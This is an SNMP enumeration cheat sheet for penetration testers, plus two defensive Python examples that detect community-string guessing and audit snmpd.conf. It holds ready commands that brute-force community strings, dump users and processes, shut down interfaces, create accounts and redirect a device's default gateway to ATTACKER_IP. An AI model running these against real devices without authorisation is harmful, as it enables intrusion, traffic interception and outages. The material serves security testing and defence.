
SNMP Enumeration

SNMP (Simple Network Management Protocol) enumeration is used to extract system information, network configuration, and running processes.

Overview

SNMP is commonly found on network devices (routers, switches, printers) and can leak substantial information with default or weak community strings.

Common Ports:

  • UDP 161 - SNMP
  • UDP 162 - SNMP Trap

SNMP Versions:

  • v1 - No encryption, community string in cleartext
  • v2c - No encryption, community string in cleartext
  • v3 - Encryption and authentication support

Community String Enumeration

Default community strings are often left unchanged.

Common Community Strings

# Common defaults
public          # Read-only (most common)
private         # Read-write
manager
community
snmp
cisco
admin
administrator

onesixtyone

Fast SNMP scanner for community string enumeration:

# Single target
onesixtyone 192.168.1.1 public

# Network scan with default strings
onesixtyone 192.168.1.0/24

# Custom community string list
onesixtyone -c community.txt 192.168.1.1

# Scan multiple targets
onesixtyone -c community.txt -i targets.txt

# Create community list
cat > community.txt <<EOF
public
private
manager
cisco
admin
secret
community
EOF
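Because v1 and v2c carry the community string in cleartext, a monitoring sensor on UDP 161 can read it and notice one source trying many strings, or sending SetRequest PDUs. The following is an added example, not part of the original page: function names, addresses, the threshold and the sample packets are constructed for illustration.

```python
from collections import defaultdict

PDU = {0xA0: "get", 0xA1: "getnext", 0xA2: "response", 0xA3: "set", 0xA5: "getbulk"}

def read_tlv(buf, pos):
    """Read one BER TLV; return (tag, value, next_pos). Raises on truncation."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2  # IndexError if header is cut off
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated value")
    return tag, buf[pos:pos + length], pos + length

def parse_snmp(payload):
    """Return (version, community, pdu) for a v1/v2c message, else None."""
    try:
        tag, body, _ = read_tlv(payload, 0)
        vtag, ver, pos = read_tlv(body, 0)
        ctag, community, pos = read_tlv(body, pos)
        ptag, _, _ = read_tlv(body, pos)
    except (ValueError, IndexError):
        return None
    version = int.from_bytes(ver, "big")
    if (tag, vtag, ctag) != (0x30, 0x02, 0x04) or version > 1:  # v3 has no community
        return None
    return ("v1", "v2c")[version], community.decode("latin-1"), PDU.get(ptag, hex(ptag))

def audit(packets, threshold=3):
    """packets: (src_ip, udp_payload) pairs. Return (guessers, writers)."""
    tried, writers = defaultdict(set), set()
    for src, payload in packets:
        msg = parse_snmp(payload)
        if msg and msg[2] != "response":
            tried[src].add(msg[1])
            if msg[2] == "set":
                writers.add(src)
    return {s: sorted(c) for s, c in tried.items() if len(c) >= threshold}, writers

def sample(community, pdu_tag=0xA0):
    """Constructed v2c request for 1.3.6.1.2.1.1.1.0 (test input, not captured traffic)."""
    pdu = bytes.fromhex("020101020100020100300e300c06082b060102010101000500")
    c = community.encode()
    body = b"\x02\x01\x01" + bytes([4, len(c)]) + c + bytes([pdu_tag, len(pdu)]) + pdu
    return bytes([0x30, len(body)]) + body

CAPTURE = [("10.0.0.5", sample(c)) for c in ("public", "private", "cisco", "admin")]
CAPTURE += [("10.0.0.9", sample("public")), ("10.0.0.7", sample("private", 0xA3))]
print(audit(CAPTURE))
```

A single poller using one community stays below the threshold; the source that cycles through four strings is reported, and any source sending a SetRequest is listed separately.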

snmp-check

# Basic enumeration
snmp-check 192.168.1.1

# Specify community string
snmp-check 192.168.1.1 -c public

# Specify port
snmp-check 192.168.1.1 -c public -p 161

# Save output
snmp-check 192.168.1.1 -c public > output.txt

SNMPwalk

Walk through the entire MIB tree to extract all available information:

# Walk entire MIB tree (v1)
snmpwalk -v1 -c public 192.168.1.1

# Walk entire MIB tree (v2c)
snmpwalk -v2c -c public 192.168.1.1

# System information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1

# User accounts
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25

# Running processes
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2

# Installed software
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.6.3.1.2

# Network interfaces
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.2.2.1.2

# TCP connections
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.6.13.1.3

# Routing table
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.4.21.1.1

# Storage information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.2.3.1.3

Key OID Queries

System Information

# System description
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.1.0

# System uptime
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.3.0

# System contact
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.4.0

# System name
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.5.0

# System location
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1.6.0

Windows-Specific OIDs

# User accounts
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25

# Running services
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.3.1.1

# Share information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.27

# Processes
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2

# Process parameters
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.5

# Installed software
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.6.3.1.2

# Local disk information
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.2.3.1

Nmap NSE Scripts

# SNMP brute force community strings
nmap -sU -p161 --script snmp-brute 192.168.1.1

# Custom wordlist
nmap -sU -p161 --script snmp-brute --script-args snmp-brute.communitiesdb=community.txt 192.168.1.1

# SNMP system information
nmap -sU -p161 --script snmp-info 192.168.1.1

# SNMP interfaces
nmap -sU -p161 --script snmp-interfaces 192.168.1.1

# SNMP network routes
nmap -sU -p161 --script snmp-netstat 192.168.1.1

# SNMP processes
nmap -sU -p161 --script snmp-processes 192.168.1.1

# SNMP Windows user enumeration
nmap -sU -p161 --script snmp-win32-users 192.168.1.1

# SNMP Windows services
nmap -sU -p161 --script snmp-win32-services 192.168.1.1

# SNMP Windows software
nmap -sU -p161 --script snmp-win32-software 192.168.1.1

# SNMP Windows shares
nmap -sU -p161 --script snmp-win32-shares 192.168.1.1

# All SNMP scripts
nmap -sU -p161 --script "snmp-*" 192.168.1.1

Metasploit Modules

msfconsole

# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.1
set COMMUNITY public
run

# SNMP login scanner
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set PASS_FILE /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
run

# SNMP share enumeration (Windows)
use auxiliary/scanner/snmp/snmp_enumshares
set RHOSTS 192.168.1.1
set COMMUNITY public
run

# SNMP user enumeration (Windows)
use auxiliary/scanner/snmp/snmp_enumusers
set RHOSTS 192.168.1.1
set COMMUNITY public
run

SNMPv3 Enumeration

SNMPv3 uses authentication and encryption but can still be enumerated if credentials are weak.

# SNMPv3 with auth and priv
snmpwalk -v3 -l authPriv -u username -a SHA -A authpass -x AES -X privpass 192.168.1.1

# SNMPv3 with only auth
snmpwalk -v3 -l authNoPriv -u username -a SHA -A authpass 192.168.1.1

# SNMPv3 no auth (if allowed)
snmpwalk -v3 -l noAuthNoPriv -u username 192.168.1.1

SNMPv3 Brute Force

# Nmap SNMPv3 enumeration
nmap -sU -p161 --script snmp-brute --script-args snmp-brute.protocol=3 192.168.1.1

# Metasploit SNMPv3 login
use auxiliary/scanner/snmp/snmp_login
set VERSION 3
set USER_FILE users.txt
set PASS_FILE passwords.txt
set RHOSTS 192.168.1.1
run

SNMP Write Access

If you find a read-write community string, you can modify device configuration.

# Test write access (change system contact)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.1.4.0 s "attacker@evil.com"

# Change system name
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.1.5.0 s "pwned"

# Shutdown interface (dangerous!)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.2.2.1.7.1 i 2

# Create user (Windows)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.4.1.77.1.2.25.1.1.testuser s "testuser"
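On the defending side, the conditions this page relies on (default community strings, a read-write community, SNMPv3 users permitted at noAuthNoPriv) are visible in the agent's configuration. The following added example, not part of the original page, audits a Net-SNMP `snmpd.conf`; the function name and the sample configuration are constructed for illustration, and the word list is the page's own list of common community strings.

```python
import shlex

# Community strings this page lists as common defaults.
COMMON = {"public", "private", "manager", "community", "snmp",
          "cisco", "admin", "administrator"}
COMMUNITY_DIRECTIVES = ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6")

def audit_snmpd_conf(text):
    """Return (line_no, finding) pairs for risky Net-SNMP snmpd.conf directives."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        tokens = shlex.split(raw, comments=True)  # drops '#' comments
        if not tokens:
            continue
        directive, args = tokens[0].lower(), tokens[1:]
        if directive in COMMUNITY_DIRECTIVES and args:
            community = args[0]
            source = args[1] if len(args) > 1 else "default"
            if directive.startswith("rw"):
                findings.append((no, "read-write community (allows snmpset)"))
            if community.lower() in COMMON:
                findings.append((no, f"guessable community '{community}'"))
            if source in ("default", "0.0.0.0/0", "::/0"):
                findings.append((no, "no source address restriction"))
        elif directive in ("rouser", "rwuser") and len(args) > 1 \
                and args[1].lower() == "noauth":
            findings.append((no, f"SNMPv3 user '{args[0]}' allowed at noAuthNoPriv"))
    return findings

# Constructed sample configuration, not taken from a real device.
SAMPLE_CONF = """\
# monitoring access
rocommunity public
rwcommunity private 10.0.0.0/24
rocommunity Xk39-monitoring-ro 10.0.0.10
rouser legacy noauth
rouser monitor priv
"""

if __name__ == "__main__":
    for line_no, finding in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {line_no}: {finding}")
```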

Important MIB OIDs

OID                      Description
1.3.6.1.2.1.1.1.0        System Description
1.3.6.1.2.1.1.5.0        System Name
1.3.6.1.2.1.1.6.0        System Location
1.3.6.1.2.1.1.4.0        System Contact
1.3.6.1.2.1.2.2.1.2      Network Interfaces
1.3.6.1.2.1.4.20.1.1     IP Addresses
1.3.6.1.2.1.4.21.1.1     Routing Table
1.3.6.1.2.1.6.13.1.3     TCP Connections
1.3.6.1.2.1.25.4.2.1.2   Running Processes
1.3.6.1.2.1.25.6.3.1.2   Installed Software
1.3.6.1.4.1.77.1.2.25    Windows Users
1.3.6.1.4.1.77.1.2.27    Windows Shares

Automated Tools

snmpwn

# Install
git clone https://github.com/hatlord/snmpwn.git
cd snmpwn

# Enumerate
python snmpwn.py -t 192.168.1.1 -c public

Braa

Faster alternative to snmpwalk for bulk queries:

# Install
apt install braa

# Query multiple OIDs
braa public@192.168.1.1:.1.3.6.1.2.1.1.*

# Multiple targets
braa public@192.168.1.1-10:.1.3.6.1.2.1.1.5.0

Python Script Example

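#!/usr/bin/env python3
# Written for the synchronous pysnmp 4.x high-level API (pysnmp.hlapi).
from pysnmp.hlapi import (
    CommunityData, ContextData, ObjectIdentity, ObjectType,
    SnmpEngine, UdpTransportTarget, getCmd,
)

def snmp_get(target, community, oid):
    """Send one SNMP GET for `oid` and print the result or the error."""
    iterator = getCmd(
        SnmpEngine(),
        CommunityData(community),  # mpModel defaults to 1 (SNMPv2c)
        UdpTransportTarget((target, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(oid))
    )

    # getCmd returns a generator; the first item is the response to the GET
    errorIndication, errorStatus, errorIndex, varBinds = next(iterator)

    if errorIndication:      # transport or engine problem, e.g. request timeout
        print(f"Error: {errorIndication}")
    elif errorStatus:        # error reported by the agent in the response PDU
        print(f"Error: {errorStatus.prettyPrint()}")
    else:
        for varBind in varBinds:
            print(f"{varBind[0]} = {varBind[1]}")

if __name__ == "__main__":
    # Usage
    snmp_get("192.168.1.1", "public", "1.3.6.1.2.1.1.5.0")  # System name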

SNMP Enumeration Checklist

# 1. Discover SNMP service
nmap -sU -p161 192.168.1.0/24

# 2. Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1

# 3. Enumerate system info
snmp-check -c public 192.168.1.1

# 4. Extract detailed information
snmpwalk -v2c -c public 192.168.1.1 > snmp_output.txt

# 5. Look for sensitive data in output
grep -i "user\|pass\|admin\|config" snmp_output.txt

# 6. If Windows, enumerate users
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25

# 7. Check for write access
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.1.4.0 s "test"

Post-Exploitation

Modifying Network Configuration

# Change default gateway (dangerous!)
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.4.21.1.7.0.0.0.0 a ATTACKER_IP

# Add static route
snmpset -v2c -c private 192.168.1.1 1.3.6.1.2.1.4.21.1.1.NETWORK i 1

Extending Cisco IOS

# Download config via SNMP (Cisco)
snmpget -v2c -c private 192.168.1.1 1.3.6.1.4.1.9.9.96.1.1.1.1.2

# Upload config
# Use SNMP to configure TFTP server, then download malicious config

Common Issues

UDP Timeouts

# Increase timeout
snmpwalk -v2c -c public -t 10 192.168.1.1

# Reduce packet size (fewer repetitions per GETBULK response; -Cr is an snmpbulkwalk option)
snmpbulkwalk -v2c -c public -Cr10 192.168.1.1

Firewall Blocking

# -r 0 disables retries (one request only); it does not enable source routing
snmpwalk -v2c -c public -r 0 192.168.1.1

Quick Reference

# Discover SNMP
nmap -sU -p161 --open 192.168.1.0/24

# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1

# Enumerate everything
snmp-check 192.168.1.1 -c public

# Extract all data
snmpwalk -v2c -c public 192.168.1.1

# Windows users
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.4.1.77.1.2.25

# Running processes
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2